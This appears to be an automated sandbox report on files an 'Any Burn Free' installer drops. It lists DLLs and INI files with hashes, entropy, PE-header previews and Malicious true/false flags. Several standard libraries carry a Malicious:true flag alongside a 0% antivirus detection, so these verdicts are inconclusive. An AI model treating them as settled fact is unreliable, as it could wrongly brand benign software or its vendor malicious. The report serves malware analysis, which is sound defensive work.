                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1065100
                                                                                                                                                                    Entropy (8bit):7.300961775371533
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:gsRe/8fBAUZLYnwPKO6lbbTCpGavkg3NyeuQ6l9fHOfD:gzKBAUZLYwiO6UpGaXBuQQ9uD
                                                                                                                                                                    MD5:B7DF9B43BF812DDAF60C99732C1AB273
                                                                                                                                                                    SHA1:4A90353C8B2845008483854642B711E917F9CEEF
                                                                                                                                                                    SHA-256:74024FE9B8A1E4F8B9B7561B336B2916A20784699CDEEF2948074F0E820C9BDE
                                                                                                                                                                    SHA-512:DB78A8AF90E8557BA37DF1B8C089B8C2E6D912CB08A7B633126541FA9A2E91A0DD90E275A83D323DB0E38BB464744225B0FD405A2C828170B5B7AC1333D6C6E7
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........8..:......#...#.....4.................... f................................V>....@... ......................P.......`..............................................................0.......................$a...............................text...............................`.P`.data...T...........................@.0..rdata..............................@.`@/4.......Q.......R..................@.0@.bss.........@........................`..edata.......P......................@.0@.idata.......`......................@.0..CRT....,....p......................@.0..tls................................@.0..rsrc...............................@.0..reloc...............$..............@.0B........................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-M6VRO.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):125637
                                                                                                                                                                    Entropy (8bit):6.2640431186303145
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                                                                                                                    MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                                                                                                                    SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                                                                                                                    SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                                                                                                                    SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-P1HCF.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):5607950
                                                                                                                                                                    Entropy (8bit):6.633599482017416
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:8IS8iFbnejXFHVSh3z6+N5NeOYVxtAcPVBgkgrumYE1HpMTdy2/vlCyUIs:85hCFVSh3fN5NeOYVxLPVBcumzJMTdyx
                                                                                                                                                                    MD5:90593C11E9997DD4224CF278D5D66323
                                                                                                                                                                    SHA1:A89583C180A66FE2C8272F8CCD9876326CB29A1E
                                                                                                                                                                    SHA-256:82AA37DDE211EE28B366603CC9C74F0584ED46D57DF7C06447060BFCFF886A07
                                                                                                                                                                    SHA-512:93A8CDFD26B4684FBBCB6FF8487E77C4996BD48B58D38FB81FE7E243D1368342F2ED27A1219CB81A9CBED72FDD4061ACE091D95C326A4C3DFF84D59E9A45114A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........U........#...$..;...U..b$...........<..............................pz.......U...@... .......................x.......x..#....y.p.................... y.8E...........................gN.....................P.x..............................text...t.;.......;.................`.``.data...\.....<.......;.............@.`..rdata.......<.......<.............@.p@/4.......v....O..x....O.............@.0@.bss.....`$..0T.......................`..edata........x.......T.............@.0@.idata...#....x..$... T.............@.0..CRT....,.....x......DT.............@.0..tls..........y......FT.............@.0..rsrc...p.....y......HT.............@.0..reloc..8E... y..F...LT.............@.0B........................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-PUUKO.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):125637
                                                                                                                                                                    Entropy (8bit):6.2640431186303145
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                                                                                                                    MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                                                                                                                    SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                                                                                                                    SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                                                                                                                    SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-SB997.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):40974
                                                                                                                                                                    Entropy (8bit):6.485702128133584
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                                                                                                                    MD5:F47E78AD658B2767461EA926060BF3DD
                                                                                                                                                                    SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                                                                                                                    SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                                                                                                                    SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-TL5F4.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3861569
                                                                                                                                                                    Entropy (8bit):5.804520996476849
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:91TNqdZZZZZwrxe/b/7wSzPrujYuq5rk3gI:91TNqJ/g
                                                                                                                                                                    MD5:946459BBDE240E1EB1FF6E5724D97971
                                                                                                                                                                    SHA1:C4BA9C2887290D24543A7C0045FADEB6AA7D3823
                                                                                                                                                                    SHA-256:8990995431737068FEBD6A5B732D90F3648D17214160E57615A7DA13FC17B9D6
                                                                                                                                                                    SHA-512:8D91B59018AA8B79E7CD90CCF95654AC06F2D5C64A0A4F16EB0B43EACC83166C795EBA8A04AB45D80079E7054EA77D22B32FB516F1908FFA0A4B5E5D317C32A6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T....................l...........................t...................(.......Rich............PE..L...x..e.....................p......l.............@.......................... ;......................................................................................................................................................................text............................... ..`.rdata...1.......@..................@..@.data....P...0...0...0..............@....rsrc................`..............@..@.cab7........`(.A....0(.............`...........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\languages\is-BOMQR.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3188
                                                                                                                                                                    Entropy (8bit):3.820146923376414
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:r9BirQRr9DW1t0Y+6HcRMRBm8K+0vNZry19:Jk+9Ot0EcF8K+d19
                                                                                                                                                                    MD5:0F16041A3EFE467EE8440060A5ED7F8A
                                                                                                                                                                    SHA1:6FB9C518E8F468275B4C821DB8D1F64DEC787687
                                                                                                                                                                    SHA-256:C84D2F1177AAD5EA224C68F34DA0CD0C8E7308BA1CC93494B3376F52051FAC93
                                                                                                                                                                    SHA-512:C362D7C35425DDA7F98CDD597F0CC1ED0510194022E5AB9AB8EC0EDCCDDD5D9214563C7D038A2A3A5FD103093074E6D3190CA374D838AA3DD4E78F75C9D2BDE3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..[.A.P.P.L.I.C.A.T.I.O.N.].....n.a.m.e.=.F.r.e.e. .M.P.3. .C.u.t.t.e.r. .J.o.i.n.e.r.....v.e.r.s.i.o.n.=.V.2.0.2.3...5.....u.r.l.=.h.t.t.p.s.:././.w.w.w...d.v.d.v.i.d.e.o.m.e.d.i.a...c.o.m./.h.o.w.-.t.o.-.c.u.t.-.m.p.3...h.t.m.l.....[.J.I.E.M.I.A.N.].....y.y.=.D.i.l. .S.e...i.m.i.....m.p.3.j.q.=.M.P.3. .K.e.s.i.c.i.....m.p.3.h.b.=.M.P.3. .B.i.r.l.e._.t.i.r.i.c.i.....k.s.j.q.=.B.a._.l.a.n.g.1... .N.o.k.t.a.s.1.:.:.....k.s.j.q.1.=.K.e.s.i.m. .B.a._.l.a.n.g.1.c.1.....j.s.j.q.=.B.i.t.i._. .N.o.k.t.a.s.1.:.....j.q.s.j.=.K.l.i.p. .S...r.e.s.i.:.....y.w.j.=.K.a.y.n.a.k.....k.s.s.j.=.S...r.e. .B.a._.1.....j.s.s.j.=.S...r.e. .S.o.n.u.....s.c.g.s.=...1.k.t.1. .B.i...i.m.i.....o.u.t.p.u.t.=...1.k.t.1. .D.o.s.y.a.s.1.:.....n.y.k.y.z.j.s.r.=.D.o...r.u.d.a.n. .d...z.e.n.l.e.m.e. .d.e.n.e.t.i.m.i. .g.i.r.i._.i. .y.a.p.1.l.a.c.a.k. .z.a.m.a.n. .b.i...i.m.i. .0.0.:.0.0.:.0.0...0.0.0.(.s.a.:.d.a.:.s.n...s.a.l.).....z.t.=.D.u.r.u.m.....z.b.=.H.a.z.1.r.....s.y.m.t.w.j.=.T...m. .S.e.s. .D.o.s.y.a.l.a.r.1.

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\languages\turkish.ini (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3188
                                                                                                                                                                    Entropy (8bit):3.820146923376414
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:r9BirQRr9DW1t0Y+6HcRMRBm8K+0vNZry19:Jk+9Ot0EcF8K+d19
                                                                                                                                                                    MD5:0F16041A3EFE467EE8440060A5ED7F8A
                                                                                                                                                                    SHA1:6FB9C518E8F468275B4C821DB8D1F64DEC787687
                                                                                                                                                                    SHA-256:C84D2F1177AAD5EA224C68F34DA0CD0C8E7308BA1CC93494B3376F52051FAC93
                                                                                                                                                                    SHA-512:C362D7C35425DDA7F98CDD597F0CC1ED0510194022E5AB9AB8EC0EDCCDDD5D9214563C7D038A2A3A5FD103093074E6D3190CA374D838AA3DD4E78F75C9D2BDE3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..[.A.P.P.L.I.C.A.T.I.O.N.].....n.a.m.e.=.F.r.e.e. .M.P.3. .C.u.t.t.e.r. .J.o.i.n.e.r.....v.e.r.s.i.o.n.=.V.2.0.2.3...5.....u.r.l.=.h.t.t.p.s.:././.w.w.w...d.v.d.v.i.d.e.o.m.e.d.i.a...c.o.m./.h.o.w.-.t.o.-.c.u.t.-.m.p.3...h.t.m.l.....[.J.I.E.M.I.A.N.].....y.y.=.D.i.l. .S.e...i.m.i.....m.p.3.j.q.=.M.P.3. .K.e.s.i.c.i.....m.p.3.h.b.=.M.P.3. .B.i.r.l.e._.t.i.r.i.c.i.....k.s.j.q.=.B.a._.l.a.n.g.1... .N.o.k.t.a.s.1.:.:.....k.s.j.q.1.=.K.e.s.i.m. .B.a._.l.a.n.g.1.c.1.....j.s.j.q.=.B.i.t.i._. .N.o.k.t.a.s.1.:.....j.q.s.j.=.K.l.i.p. .S...r.e.s.i.:.....y.w.j.=.K.a.y.n.a.k.....k.s.s.j.=.S...r.e. .B.a._.1.....j.s.s.j.=.S...r.e. .S.o.n.u.....s.c.g.s.=...1.k.t.1. .B.i...i.m.i.....o.u.t.p.u.t.=...1.k.t.1. .D.o.s.y.a.s.1.:.....n.y.k.y.z.j.s.r.=.D.o...r.u.d.a.n. .d...z.e.n.l.e.m.e. .d.e.n.e.t.i.m.i. .g.i.r.i._.i. .y.a.p.1.l.a.c.a.k. .z.a.m.a.n. .b.i...i.m.i. .0.0.:.0.0.:.0.0...0.0.0.(.s.a.:.d.a.:.s.n...s.a.l.).....z.t.=.D.u.r.u.m.....z.b.=.H.a.z.1.r.....s.y.m.t.w.j.=.T...m. .S.e.s. .D.o.s.y.a.l.a.r.1.

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\libbz2-1.dll (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):105784
                                                                                                                                                                    Entropy (8bit):6.258144336244945
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                                                                                                                    MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                                                                                                                    SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                                                                                                                    SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                                                                                                                    SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\libgcc_s_dw2-1.dll (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):125637
                                                                                                                                                                    Entropy (8bit):6.2640431186303145
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                                                                                                                    MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                                                                                                                    SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                                                                                                                    SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                                                                                                                    SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\libiconv-2.dll (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1065100
                                                                                                                                                                    Entropy (8bit):7.300961775371533
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:gsRe/8fBAUZLYnwPKO6lbbTCpGavkg3NyeuQ6l9fHOfD:gzKBAUZLYwiO6UpGaXBuQQ9uD
                                                                                                                                                                    MD5:B7DF9B43BF812DDAF60C99732C1AB273
                                                                                                                                                                    SHA1:4A90353C8B2845008483854642B711E917F9CEEF
                                                                                                                                                                    SHA-256:74024FE9B8A1E4F8B9B7561B336B2916A20784699CDEEF2948074F0E820C9BDE
                                                                                                                                                                    SHA-512:DB78A8AF90E8557BA37DF1B8C089B8C2E6D912CB08A7B633126541FA9A2E91A0DD90E275A83D323DB0E38BB464744225B0FD405A2C828170B5B7AC1333D6C6E7
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........8..:......#...#.....4.................... f................................V>....@... ......................P.......`..............................................................0.......................$a...............................text...............................`.P`.data...T...........................@.0..rdata..............................@.`@/4.......Q.......R..................@.0@.bss.........@........................`..edata.......P......................@.0@.idata.......`......................@.0..CRT....,....p......................@.0..tls................................@.0..rsrc...............................@.0..reloc...............$..............@.0B........................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\libogg-0.dll (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):40974
                                                                                                                                                                    Entropy (8bit):6.485702128133584
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                                                                                                                    MD5:F47E78AD658B2767461EA926060BF3DD
                                                                                                                                                                    SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                                                                                                                    SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                                                                                                                    SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\libvorbis-0.dll (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):176200
                                                                                                                                                                    Entropy (8bit):6.647007817777345
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                                                                                                                    MD5:6896DC57D056879F929206A0A7692A34
                                                                                                                                                                    SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                                                                                                                    SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                                                                                                                    SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\libvorbisenc-2.dll (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):555894
                                                                                                                                                                    Entropy (8bit):3.4167624637949925
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:TnOHRuNruVRJ/RbM4YkuYFSwqFux5T8hac1eQ3RcMLQa9gKutRJhuusoAu3FsWVI:2z8wqux5TEacQmRcMcpfLnFQ
                                                                                                                                                                    MD5:77A96C1C8E72D12BE4DFA5600A67E0F4
                                                                                                                                                                    SHA1:F1A94189F7DA47DB26E332024C255AFAA085A654
                                                                                                                                                                    SHA-256:E6A08981AB88E25B892DB826D75EBE4C3A9EC932704F722B3E32E5D9C8CD359C
                                                                                                                                                                    SHA-512:267951B1CF2C745DA69265EEF7E921FF4A9F07C49000EB30D3C1793634C6AB61AB3A897E418A56C77C3F8F735AA2844FC6BF564DC2D88C9C0835A37A318AD52B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........v..$......#...#.:...r...............P.....k......................................@... .................................t............................................................Z.........................|............................text....8.......:..................`.P`.data...D....P.......>..............@.0..rdata..$....`.......@..............@.`@/4......L....`.......@..............@.0@.bss.........p........................0..edata...............L..............@.0@.idata..t............N..............@.0..CRT....,............R..............@.0..tls.................T..............@.0..reloc........... ...V..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\libwinpthread-1.dll (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):68552
                                                                                                                                                                    Entropy (8bit):6.1042544770100395
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                                                                                                                    MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                                                                                                                    SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                                                                                                                    SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                                                                                                                    SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\setting.ini (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):442
                                                                                                                                                                    Entropy (8bit):3.8280681998470794
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:Q+gZPiv77qlXS8lvlRFo1MonAUNycdlUlaT9SaG:Q+gZPo7GU0vlRq1pnAUNnd+gTAaG
                                                                                                                                                                    MD5:09204E71E9F3B624E909FB20DEFE6EF5
                                                                                                                                                                    SHA1:2374900EBB8D9BB7127217DAE828A949B8E7938B
                                                                                                                                                                    SHA-256:D0755838EFEF3A423FFF51C91B2AEC497EB6C1A2A845534D6918C433E1F95267
                                                                                                                                                                    SHA-512:7B6FE24B112EED282D5795F0D2D122CC71539823609F1F3A7A5B3CAFEC8C86F00B310454B0CB607F881DBA99E7F2E55DD6EEDC31A3CC3D1F2B10FE43A923DE8F
                                                                                                                                                                    Malicious:false
